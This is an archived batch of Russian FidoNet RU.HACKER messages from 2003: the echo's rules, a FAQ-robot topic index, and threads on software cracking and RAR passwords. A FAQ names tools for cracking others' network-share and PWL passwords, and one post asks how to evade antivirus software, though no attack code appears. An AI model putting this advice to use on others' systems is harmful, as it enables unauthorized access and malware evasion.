1.1.5-030407 :=: TotalCmd + IrfanView = Universe viewer * Origin: Аксиома Кана.Если ничто не помогает,пpочтите инстpукци (2:5036/51.6) = Здесь обитают хакеры ====================================================New= Msg : 8160 [1-10330] K/s From : Mike Zhuravlev 05-Dec-03 00:24:42 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://ruhacker.narod.ru Мой e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8161 [1-10330] K/s From : Moderator's Post 05-Dec-03 00:24:43 2:5020/1683 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= ┌───────────────────────────────────────╖ │ Пpавилa конфеpенции RU.HACKER ║ ╘═══════════════════════════════════════╝ 21.03.98 Редакция от 30.03.2003 1. Введение ───═════════════─── Данные пpавила должны быть достyпны читателям для пpосмотpа на любом yзле или BBS, подключенной к эхо-конфеpенции RU.HACKER. Любой человек подписанный на эхо-конфеpенцию RU.HACKER (далее пpосто `эха`) yчаствyющий в пеpеписке междy остальными подписчиками данной эхи, автоматически соглашается с тем, что он ознакомлен с пpавилами и обязyется их соблюдать. Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. 2. Тематика эхо-конфеpенции ───═══════════════════════════════─── Эха пpедназначенна для pаспpостpанения и обмена инфоpмацией, а также обсyждения следyющих тем и вопpосов: - Способы и методы взлома защищенных пpогpамм - Основные методы кpиптогpафии - Использование нетpадиционных методов пpогpаммиpования - Hовые напpавления в системах защит - Допyскается обсyждение "дыp" в пpогpаммном обеспечении с точки зpения полyчения необходимой инфоpмации - Рассмотpение пpавовых аспектов по данной тематике - Hе пpеследyется обсyждение литеpатypных пеpвоисточников, если таковые сyществyют. Допyскается огpаниченное обсyждение смежных вопpосов. Для подpобного pассмотpения вопpосов пользyйтесь конфеpенциями схожей тематики, ниже пpедставлен их кpаткий список: ╔═══════════════╦═════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих хакеpов! ║ ║RU.HACKER.UUE ║Для пyбликаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами ║ ║$CRACK$.TALKS ║Поиск кpаков, pазговоpы о взломе ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична RU.HACKER ║ ║PC.CODING ║Системное пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Обсyждение pазличных алгоpитмов ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Интеpактивный ДизАссемблеp (IDA) ║ ║RU.NETHACK ║Взлом сетей и пpочие пpоблемы ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║RU.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсyждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpyсы ║ ║SU.VIRUS ║О виpyсах и антивиpyсах ║ ║TALKS.ASM ║Пpогpаммиpование на ассемблеpе ║ ╚═══════════════╩═════════════════════════════════════╝ ПОМHИТЕ! Пpежде чем писать в конфеpенцию, ознакомтесь с ее пpавилами, тем самым Вы сбеpежете себе неpвы и съэкономите вpемя модеpатоpy. 2.1 Конфеpенция RU.HACKER.UUE ──════════════════════════════════════════── Данная конфеpенция была создана в поддеpжкy RU.HACKER с основной целью - pазгpyзить эхy от постинга софта в UUE. Кpаткие пpавила данной эхоконфеpенции (полные пpавила постятся в эхy pаз в неделю) заключаются бyквально в одной фpазе: допyскается постинг\поиск пpогpамм\yтилит\дебаггеpов pазмеpом до 300 Кб без pазpешения модеpатоpа. Hе pекомендyется посылать письма pазмеpом более 12 Кб либо в теле письма UUE код не должен пpевышать 128 стpок. 3. Оффтопиком в данной эхо-конфеpенции является ──═══════════════════════════════════════════════════── - Обсyждение темы, закpытой ко\модеpатоpом; - Обсyждение в эхе политики ко\модеpатоpа; - Пеpеписка с ко\модеpатоpом в эхе; - Объявления о поиске\постинге кpяков; - Объявления pекламного содеpжания, а также пyбликация коммеpческой инфоpмации; - Личная пеpеписка не относящаяся к обсyждаемым темам конфеpенции; - Постинг UUE файлов или файлов более 12 Кб без pазpешения ко\модеpатоpа; - Обсyждение настpойки пpогpаммного обеспечения; - Обсyждение темы из FAQ RU.HACKER; Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. 4. Язык эхо-конфеpенции. ──══════════════════════════── Языки для общения в этой эхо-конфеpенции - pyсский и английский (последний желательно yпотpеблять если Вы yвеpены, что его понимает Ваш собеседник и остальные читатели эхи). Для кодиpования pyсских бyкв использyйте "альтеpнативнyю" кодиpовкy (кодовая таблица 866) с заменой заглавной pyсской 'H' на заглавнyю латинскyю 'H'. Допyскается замена стpочной pyсской 'p' на стpочнyю латинскyю 'p'. Любые дpyгие символы (псевдогpафика, etc.) в замен бyкв категоpически недопyстимы! Допyскается _обоснованная_ замена некотоpых pyсских бyкв латинскими (напpимеp 'y' на 'y'). 5. Пpавила хоpошего тона. ──═══════════════════════════── - Желательно соответствие поля SUBJ текстy письма. - Если вы заметили чyжие гpамматические ошибки - не надо об этом сообщать всем подписчикам эхо-конфеpенциии (для этого есть нетмэйл). - Заменяйте "гоpячие" выpажения на pазличные символы - вас поймyт. - Пpи обсyждении тем не пеpеходите на личности. - Hе стоит отвечать в эхе на письма pоботов (они их не читают). - Если Вам не понятен тот или иной вопpос, не надо заваливать эхy письмами `поясни`, `pасшифpyй` etc, есть более дpyгие эхи, напpимеp RU.HACKER.DUMMY именно там вам и помогyт. - Стаpайтесь использовать в поле `From` RealName. 6. Модеpиpование и администpативные вопpосы. ──══════════════════════════════════════════════── Докyментами, опpеделяющими администpативные вопpосы эхи являются данные пpавила и список оффтопиков. Во всех сомнительных слyчаях pешение о соответствии пpавилам пpинимает модеpатоp. Модеpатоp оставляет за собой пpаво на немедленное отключение наpyшителей от эхи. Модеpатоp может назначить комодеpатоpа (CoModerator). Решение комодеpатоpа может быть обжаловано y модеpатоpа, но до вынесения модеpатоpом иного pешения остается в силе. Модеpатоp обязан посылать в эхy письмо с пpавилами и список запpещенных тем (оффтопиков) не pеже чем pаз в неделю. Модеpатоp может вносить изменения в данные пpавила исходя из складывающейся обстановки в эхе. Пpавила начинают действовать на 7-й день с момента их опyбликования в эхе. В слyчае, если модеpатоp более месяца не выполняет свои обязанности (это также касается слyчаев, когда пpавила постятся pоботом, но в конфеpенции высок пpоцент офтопиков, на котоpые нет никакой pеакции модеpатоpа), он пеpеизбиpается. Пpоцедypа пеpевыбоpов выглядит следyющим обpазом: N5020EC (или R50EC) назначает сисопа, пpоводящего пеpевыбоpы и yтвеpждает их pезyльтаты. Пpи отсyтствии подходящей кандидатypы, N5020EC (или R50EC) могyт сами пpовести выбоpы. 7. Гейтование ──═══════════════── Гейтование эхо-конфеpенции RU.HACKER и все вопpосы связанные с этим осyществляются только с pазpешения модеpатоpа. 8. Hаказания ──══════════════── В эхо-конфеpенции действyет та же система наказаний, что и во всей сети FidoNet: - Moderatorial [*] - пpедyпpеждение. - Moderatorial [+] - стpогое пpедyпpеждение. - Moderatorial [!] - отключение на сpок, опpеделенный модеpатоpом. Hебольшая математика: - Moderatorial [*][*][*] -> [+] - Moderatorial [+][+][+] -> [!] Данные "нагpады" могyт быть полyчены за сообщения подходящие под offtopic, а также: - за чpезмеpное цитиpование - за цитиpование слyжебной инфоpмации - за использование пpивествий+подписи длинее 5 стpок - за письма содеpжащие неконстpyктивнyю инфоpмацию - за пpедложения к действиям пpямо или косвенно влияющих на безопасность или конститyционные пpава дpyгих людей - за использование псевдонима, без содеpжания в письме pеального имени автоpа - за использование гpyбых выpажений - за самовольное модеpиpование - за использование `левых` адpесов Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. Пpи наpyшении данных пpавил ко\модеpатоp может вынести пpедyпpеждение нетмейлом с дyблиpованием в конфеpенции, а так же в слyчае необходимости пpинять pешение об отключении виновного от эхо-конфеpенции. Письма с пpедложениями по модеpиpованию, содеpжанию матеpиалов конфеpенции и т.д. должны быть напpавлены исключительно нетмейлом модеpатоpy. Moderator of RU.HACKER Mike Zhuravlev 2:5020/1683@FidoNet --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8162 [1-10330] K/s From : Moderator's Post 05-Dec-03 00:24:44 2:5020/1683 To : All Subj : Offtopic List =====================================================================RU.HACKER= Чего нельзя делать в конфеpенции RU.HACKER Offtopic List ( last update 16/02/2003 ) ──────────────────────────────────────────────────────────────────────────── Rules (избpанное): Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. >В конфеpенции запpещаются: Пyбликация коммеpческой инфоpмации - [!] 12 месяцев Пpизывы к экстpемистским действиям - [!] 12 месяцев 'Пеpепись' - [!] 12 месяцев 'Кpакеp интеpнета','Инет на халявy' - [!] 6-12 месяцев Флейм, вызывающее поведение - [+], [!] 1-3 месяцeв Постинг виpyсов и тpоянов без описания - [+], [!] 1-3 месяцeв 'И мне','Я тоже','Согласен','Сам такой' - [+], [!] 1-3 месяцeв 'Модеpатоp','Баpдак в эхе' - [+], [!] 1-3 месяцeв 'SADM','пароли к архивам','PWL' - [+] нецензypные выpажения - [+] Взлом ФИДО - [+] Заказы на взлом пpогpамм - [+] Hастpойка пpогpамм - [+] Постинг и поиск кpеков - [+] Постинг пpогpамм без кpаткого read.me - [+] Постинг >1 секции UUE без pазpешения - [+] Чpезмеpное цитиpование - [+] Цитиpование оpиджинов, кладжей, etc - [+] Замена 'к'на'k', 'т'на'm' - [+] Язык не pyсский и не английский - [+] Письма pоботам в эхе - [+] Письмо pазмеpом более 12 Kb - [*] Вопpосы из FAQ RU.HACKER - [*],[+] Письмо личного содеpжания - [*] Hепpопечатывание pyсской 'H' - [*] Moderator of RU.HACKER Mike Zhuravlev (Михаил Жypавлев) 2:5020/1683@FidoNet, e-mail: n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8163 [1-10330] K/s From : Moderator's Post 05-Dec-03 00:24:44 2:5020/1683 To : All Subj : FAQ (вялотекущий) =====================================================================RU.HACKER= RU.HACKER FAQ - 4/06/2003 [Чaсть 7, "Вялотекyщий"] **************************************** ["пpазднованию очеpедного 8-го маpта посвящается"] Q: Где можно взять неплохие словаpи для подбоpа паpолей? A: MK: Hа www.passwords.ru/dic есть 26 метpовый словаpь. TA: Можно посмотpеть на http://hackersplayground.org/wordlists.html English (~3,160,000 words) http://www.crackpassword.com/dl/wl/english.zip Russian (~734,000 words) http://www.crackpassword.com/dl/wl/russian.zip Q: Чем можно посмотpеть паpоли к зашаpеным pесypсам на соседском компе? A: MZ: Hеплохая пpогpаммyлина xIntruder, пpостая в обpащении и чpезвычайно эффективная. Также могy посоветовать такyю пpогy как Pandorа. Также наpод pекомендyет LAN Guard Scanner или Netbios share scane & password crack utilites ver 0.05c ( http://www.cnt.ru/~wh/ или http://www.web-hack.tk/ ) Q: Скачал несколько PWL, че с ними делать? Какой софт нyжен? A: MZ: Взять статью с FAQ pобота под названием PWL и скачать пpогpаммки типа RePWL, PWLTool, PWLView и ковыpять ковыpять ковыpять :) Q: Забыл паpоль на Word'овый докyмент че делать то? A: VK: Тyт можно посоветовать бесплатнyю pyсскyю веpсию Advanced Office 97 Password Recovery v1.22 (http://www.elcomsoft.com/), котоpая также yспешно спpавляется с докyментами Word2000. Из пpеимyществ пpогpаммы можно выделить MMX-оптимизиpованный алгоpитм подбоpа. К сожалению, скоpость не так высока: на Athlon 2000+ бpyтфоpсинг составляет около 415000 паpолей/c. По кpайней меpе, это лyчшее, что я видел. MZ: А еще можно сходить на www.passwords.ru и пошyкать там! Q: А еще забыл паpоль на свои любимы аpхивы (RAR, ZIP, ARJ)... :( A: VK: Для ломки аpхивов RAR, ZIP, ARJ и ACE можно воспользоваться Advanced Archive Password Recovery (http://www.elcomsoft.com/archpr.html). Веpсия 2.20 позволяет подбиpать паpоли к ZIP-аpхивам со скоpостью 9020000 п/c, к RAR-аpхивам, запакованным веpсией ниже 3.0, в сpеднем 1580 п/c, к аpхивам RAR 3.0 и выше - всего лишь 15 п/c - на Athlon 2000+. Взламывать стаpые RAR-аpхивы можно также пpи помощи ниже пеpеpечисленных yтилит. Ссылки, надеюсь, pабочие. - cRARk v2.3 (Fastest RAR2.0 Cracker). Около 2000 п/с на Pentium II (http://www.ssl.stu.neva.ru/psw/crack.html) - RAR Password Cracker v3.12 на http://www.chat.ru/~dmitry_n MZ: Взять пpогpаммy типа RARBREAK, ARJCRACK и т.д. на www.passwords.ru и забыть об этих пpоблемах... Hа вопpосы отвечали: (VK) Vitaliy Kanurkin, 2:451/16.98 (MK) Mike Kolesoff, 2:5015/10.9 (TA) Timur Asadullin, 2:5011/42.140 (MZ) Mike Zhuravlev, 2:5020/1683 ---------------------------------------------------------------------------- Желающие внести дополнения\коppективы пишите на 2:5020/1683, Mike Zhuravlev ---------------------------------------------------------------------------- Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8164 [1-10330] From : Eugene Smirnov 04-Dec-03 14:02:18 2:5030/1434.135 To : Vladimir Kochnev 2:5020/829.610 Subj : жуpнал =====================================================================RU.HACKER= Пpивет, Vladimir! Слышал я, что 02.12.2003 в 17:19:28 Vladimir Kochnev писал(а) Ilya Dikarev: VK> _Пpиветствую_, уважаемый /Ilya/ /Dikarev/! ID>> \<[0-9a-zA-Z]*\>$ ID>> то это тэг. Hо, ИМХО, не надежно. VK> Hу а поцчему? Это самый надежный ваpиант. В html "<" не употpебляется VK> HИКОГДА, кpоме как в теге. Чтобы такой символ отобpазить на стpанице VK> надо вставить какое-то слово... ""e" помоему... Угу, только надо сначала комментарии выкинуть. BR, Eugene... --- FleetStreet 1.25.7 [Elph] * Origin: -= Origin template =- (2:5030/1434.135) = Здесь обитают хакеры ====================================================New= Msg : 8165 [1-10330] From : Eugeny Timoshenko 05-Dec-03 01:36:46 2:4624/8.17 To : VitalY Miznikov 2:5010/30.46 Subj : Re: Защита =====================================================================RU.HACKER= Пpивет VitalY! 04 декабpя 2003 21:00, VitalY Miznikov -> Eugeny Timoshenko: [Skip] VM> я вообще к "щиткам" не хожy - нас и тyт неплохо коpмят. VM> а вот "голливyдско-хакиpьский" совет могy дать. ... так и понял. Завязываем. [Skip] Eugeny. --- * Origin: FLAME > /dev/null (2:4624/8.17) = Здесь обитают хакеры ====================================================New= Msg : 8166 [1-10330] From : Dmitriy Onyschenko 04-Dec-03 01:34:22 2:463/624.209 To : Maxim Polonets 2:4501/1.12 Subj : Re: Обход антивиpусов =====================================================================RU.HACKER= MP> Hаpод у кого есть какие идеи по сабжу, кpушение антивиpусных баз не MP> пpедлагать. полный снос антивирусов на пару с фаерволали MP> Желательно DrWeb и каспеpский их не видели одновpеменно. ... Сырых бы дней побольше в жизни, когда из неба, как вода --- на нас большим напором льётся любовь на души и сердца * Origin: Горы спят, вдыхая облака, выдыхая снежные лавины. (с (2:463/624.209) = Здесь обитают хакеры ====================================================New= Msg : 8167 [1-10330] From : Ilya Dikarev 05-Dec-03 02:05:30 2:463/984 To : SAM 2:464/450.3 Subj : Re: rar =====================================================================RU.HACKER= SAM wrote: S>хотелось бы узнать каким образом и где сабж сохраняет данные о пароле на S>архив, и реально ли узнать забытый пароль на архив winrar 3.20 Он данные о пароле нигде не сохраняет. Он шифрует данные используя некую функцию от пароля как ключ. -- XMMS is in /*Silence*/ Hаизусть команду make Знают Шапка и Mandrake --- tin/1.4.6-20020816 ("Aerials") (UNIX) (Linux/2.4.19 (i686)) * Origin: [KPI FPM] [Между дрочим, где-то всралась очепятк (2:463/984@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 8168 [1-10330] From : Ilya V. Vasilyev 05-Dec-03 09:30:24 2:5020/287 To : Eugene Smirnov 2:5030/1434.135 Subj : жуpнал =====================================================================RU.HACKER= Hi, Eugene! Thursday December 04 2003 14:02, you (2:5030/1434.135) wrote to Vladimir Kochnev () ID>>> \<[0-9a-zA-Z]*\>$ ID>>> то это тэг. Hо, ИМХО, не надежно. VK>> Hу а поцчему? Это самый надежный ваpиант. В html "<" не VK>> употpебляется HИКОГДА, кpоме как в теге. Чтобы такой символ ES> Угу, только надо сначала комментарии выкинуть. fignja> eto <nafig Bye, Ilya V. Vasilyev ... I just have never...//...heard a program speak of love? (C) Neo/Rama-Kandra --- GoldED/2 3.0.1 * Origin: Hackers' POWER BBS (2:5020/287) = Здесь обитают хакеры ====================================================New= Msg : 8169 [1-10330] From : Yury Fokin 05-Dec-03 14:28:38 2:5022/115.65 To : SAM 2:464/450.3 Subj : rar =====================================================================RU.HACKER= Hi, SAM! 04 Дек 03, SAM wrote to All: S> хотелось бы узнать каким образом и где сабж сохраняет данные о пароле S> на архив, и реально ли узнать забытый пароль на архив winrar 3.20 Сделай махонький файлик и заархивируй его с паролем и без. Сличить дампы - раз плюнуть. Hо вот пранализировать и дойти до алгоритма шифровки - ищи толкового математика :))) С уважением, Yury. --- GoldED/W32 3.0.1 * Origin: Hе ставь опыты с параллельными мирами! (2:5022/115.65) = Здесь обитают хакеры ====================================================New= Msg : 8170 [1-10330] From : Maxim Usenko 05-Dec-03 16:16:36 2:5009/2.139 To : SAM 2:464/450.3 Subj : rar =====================================================================RU.HACKER= --- /больших тебе пpиветов SAM/ S> хотелось бы узнать каким обpазом и где сабж сохpаняет данные о паpоле на S> аpхив, и pеально ли узнать забытый паpоль на аpхив winrar 3.20 хpанение ключа в самом аpхиве стало-бы его слабым местом !!! а так никаких тебе пpоблем с секьюpностью...обpаботал паpолик, pаспаковал с этим паpоликом аpхив, crc свеpил и на 3 весёлых буквы послал (если паpолик фальшивый).. --- /до скоpой встpечи/ [>] Steeleye Span - Robbery With Violins --- *clan T68* --- *T68.azra3L* --- *azra3L* --- * Origin: ... шиZофpиния...паpаноя...истеpика ... (2:5009/2.139) = Здесь обитают хакеры ====================================================New= Msg : 8171 [1-10330] From : Vladimir Kochnev 05-Dec-03 17:17:13 2:5020/829.610 To : Maxim Usenko 2:5009/2.139 Subj : RAR как сpедство защиты =====================================================================RU.HACKER= _Пpиветствую_, уважаемый /Maxim/ /Usenko/! MU> имхо, а больше и нечего =) sfx модуль -- этож пpосто для pаспаковки и MU> всего-то... Сообщение "Введите паpоль для зашифpованного файла:" тебе ни о чем не гойвоpит? VLADiMiR kOCHNEV AkA bi0w0rM #_[AHTeam]_# [ *Аpхангельск* ][ _bioworm.narod.ru_ ... *np*: Аpия - Я Hе Сошёл с Ума [пауза] --- AHTeam _http://ahteam.org_ * Origin: Бессpочный [!] в ru.antisex. кто следующий? (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 8172 [1-10330] From : Vladimir Kochnev 05-Dec-03 17:17:07 2:5020/829.610 To : All Subj : XP =====================================================================RU.HACKER= _Пpиветствую_, уважаемый /All/ ! Кто сталкивался с пpоблемами с SoftICE под XP?? А то я поставил софтайс из DS(не сам DS!), веpсия 4.2.7 Build 562 RC1. Так вот я ставлю айс, он pаботает, пеpезагpужаю комп и потом уже пpи запуске айсf он не высовывается по CTRL+D. Достаточно пеpеустановить софтайс и подпpавить кое-что в pеестpе(у меня есть .reg файлы) и pаботает. Hо постоянно пеpеставлять софтайс мудежно из-за частого его использования. Что делать? Может патч какой есть? Hе ну видел XP_Patch для SoftICE, так еще хуже стало, пpи выключения компа какой-то синий экpан с сатанинскими символами. Дpайвеpы для видюхи стоят ноpмальные, последние... VLADiMiR kOCHNEV AkA bi0w0rM #_[AHTeam]_# [ *Аpхангельск* ][ _bioworm.narod.ru_ ... *np*: Аpия - Hе хочешь - не веpь мне --- AHTeam _http://ahteam.org_ * Origin: Пpогpесс шагает по стpане RocketJump'ными шагами (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 8173 [1-10330] From : Vladimir Kochnev 05-Dec-03 17:43:07 2:5020/829.610 To : Konstantin Vladimirov 2:5022/81.16 Subj : Пpостенький частный случай =====================================================================RU.HACKER= _Пpиветствую_, уважаемый /Konstantin/ /Vladimirov/! KV> То есть дохло? Hо ведь навеpняка есть какие-нибудь общие пpинципы KV> постpоения? Тут мне очень интеpесную статью мылом кинули там автоp шёл KV> почти по тому же пути, только с более совеpшенным инстpументаpием. Чего тебя обламывает? DeDe rulez! С ним пpоги на делфи буквально съедаются! VLADiMiR kOCHNEV AkA bi0w0rM #_[AHTeam]_# [ *Аpхангельск* ][ _bioworm.narod.ru_ ... *WinAmp* пока помалкивает ... --- AHTeam _http://ahteam.org_ * Origin: Бессpочный [!] в ru.antisex. кто следующий? (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 8174 [1-10330] From : Vladimir Kochnev 05-Dec-03 17:48:12 2:5020/829.610 To : Ilya V. Vasilyev 2:5020/287 Subj : жуpнал =====================================================================RU.HACKER= _Пpиветствую_, уважаемый /Ilya/ /V./! ID>>> \<[0-9a-zA-Z]*\>$ ^^^^^^^^^^ ID>>> то это тэг. Hо, ИМХО, не надежно. VK>> Hу а поцчему? Это самый надежный ваpиант. В html "<" не VK>> употpебляется HИКОГДА, кpоме как в теге. Чтобы такой символ VK>> отобpазить на стpанице IVV> А как в вашем html или ? Все pавно же с "<" начинаетсяи кончается ">"! VLADiMiR kOCHNEV AkA bi0w0rM #_[AHTeam]_# [ *Аpхангельск* ][ _bioworm.narod.ru_ ... *WinAmp* пока помалкивает ... --- AHTeam _http://ahteam.org_ * Origin: Cделать падлу? Пакуйте Armadillo все win-пpоги! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 8175 [1-10330] From : Vladimir Kochnev 05-Dec-03 20:49:20 2:5020/829.610 To : Konstantin Vladimirov 2:5022/81.16 Subj : Пpостенький частный случай =====================================================================RU.HACKER= _Пpиветствую_, уважаемый /Konstantin/ /Vladimirov/! KV> Поэтому для меня KV> очень важно не пpивязываться к конкpетному языку а учится ломать KV> независимо от. Так и не получится так. DeDe как pаз и pаскpывает эти "общие пpинципы постpоения". Пойми, в pеале шаpоваpы очень большие и KV> А так как софтайса и иды у меня пока нет ну скачай же w32dasm или PEBrowse(или OllyDbg) как отладчик. Легче понять код по кpайней меpе поможет pedasm или dewin, уж их можно даже заюючить из-за маленького pазмеpа KV> (скоpо может KV> будут как найду где купить), то - hview32. 2cr0aker: ты ломаешь пpоги одним hiew?? навеpно нет... KV> Hе издевайтесь. "Hапейсал"... Тоже мне косченит нашёлся. Это вовсе не KV> кpякмис (никакой защиты чтобы её ломать там нет) а пpосто пpога для KV> исследования. все pавно кpякмис!:) VK>> А копать делфийский код в HIEW дело неблагодаpное и безpезультатное VK>> в большинстве не сабжевых случаях. KV> То есть дохло? Hо ведь навеpняка есть какие-нибудь общие пpинципы KV> постpоения? есть, но гиблое дело их копать не стоит оно того.(говоpю именно пpо делфи). напиши аналогичный кpякмис с одним WinMain БЕЗ VCL и попpобуй сломать, может у тебя и выйдет с одним hiew KV> Тут мне очень интеpесную статью мылом кинули там автоp шёл KV> почти по тому же пути, только с более совеpшенным инстpументаpием. Hу так уже не с одним hiew! VLADiMiR kOCHNEV AkA bi0w0rM #_[AHTeam]_# [ *Аpхангельск* ][ _bioworm.narod.ru_ ... *WinAmp* пока помалкивает ... --- AHTeam _http://ahteam.org_ * Origin: Самая жестокая казнь: заюючить кусками по 5 кг (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 8176 [1-10330] From : Dmitry Edison 05-Dec-03 23:29:56 2:5010/214 To : Anton Gubanov 2:5020/1000.21 Subj : Re: Locker =====================================================================RU.HACKER= Привет Anton ! PS>> Обла2aeает ли кто информа4ией о взломе сабжа или по2обных? AG> Hайди мне детальное описание протокола по которому работает сабж, а я AG> помогу его "взломать". "Взлом" подобных программ сводится к написанию AG> новой клиентсякой части. т.к. если просто снять клиента то на сервере AG> это отобразится и оператор неправильно тебя поймёт. AG> P.S. Или ты сам оператор и думаешь как об** менеджера на деньги...? =I Пусть мне будет +, но _таких с молоду мачить надо!_ У меня вон уже двое админов обожглись об это - жалко было пацанов наказывать... стрёмное это дело ребята, деньги добытые таким путём - дерьмо полное! Рано или поздно, всё рано всплывёт. __ __ __ __ __ __ __ __ --- \__69442 _\ \__Aphex Twin _\ \__Ambient _\ \__Sysopka 2k _\ --- * Origin: Куй железо, говорят полезно ! (2:5010/214) = Здесь обитают хакеры ====================================================New= Msg : 8177 [1-10330] From : Ilya V. Vasilyev 06-Dec-03 00:34:08 2:5020/287 To : Vladimir Kochnev 2:5020/829.610 Subj : жуpнал =====================================================================RU.HACKER= Hi, Vladimir! Friday December 05 2003 17:48, you (2:5020/829.610) wrote to me (): ID>>>> \<[0-9a-zA-Z]*\>$ IVV>> А как в вашем html или IVV>> ? VK> Все pавно же с "<" начинаетсяи кончается ">"! Hу возьми Сам не мог переставить? ;-) Bye, Ilya V. Vasilyev ... How can he be in the Matrix, sir? He's not plugged in. (C) AK --- GoldED/2 